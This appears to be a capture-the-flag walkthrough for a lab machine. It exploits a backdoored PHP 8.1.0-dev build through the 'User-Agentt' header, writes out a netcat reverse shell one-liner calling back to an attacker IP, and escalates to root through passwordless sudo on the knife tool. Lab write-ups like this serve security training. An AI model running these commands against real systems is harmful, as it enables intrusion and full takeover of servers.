As usual, let's start with nmap:
nmap -sV -sC 10.10.10.242
curl -I 10.10.10.242
Let's google php/8.1.0-dev exploit and see what we can find.
We find this exploit on exploit-db: https://www.exploit-db.com/exploits/49933
"An early release of PHP, the PHP 8.1.0-dev version was released with a backdoor on March 28th 2021, but the backdoor was quickly discovered and removed. If this version of PHP runs on a server, an attacker can execute arbitrary code by sending the User-Agentt header. The following exploit uses the backdoor to provide a pseudo shell on the host."
Let's download the exploit to our VM
Enter the url of the target machine
We got the shell!
The shell is not very interactive, it doesn't respond to the cd command, but we can use this trick:
From your VM, open a new command prompt and type
nc -lnvp 1234
Now from the target's machine type:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.3 1234 >/tmp/f
Now go back to your netcat (nc) if you've got a shell!
python3 -c 'import pty;pty.spawn("/bin/bash")'
Now we have a proper shell!
Congratulations! You got the user flag!
Now let's try to get the root flag:
Access is denied so we need to escalate our privileges.
This means the command knife can be called as root without providing any passwords!
After googling how to use knife, we come up with this command:
sudo knife exec -E 'system("cat /root/root.txt")'
Congratulations! You got the root flag!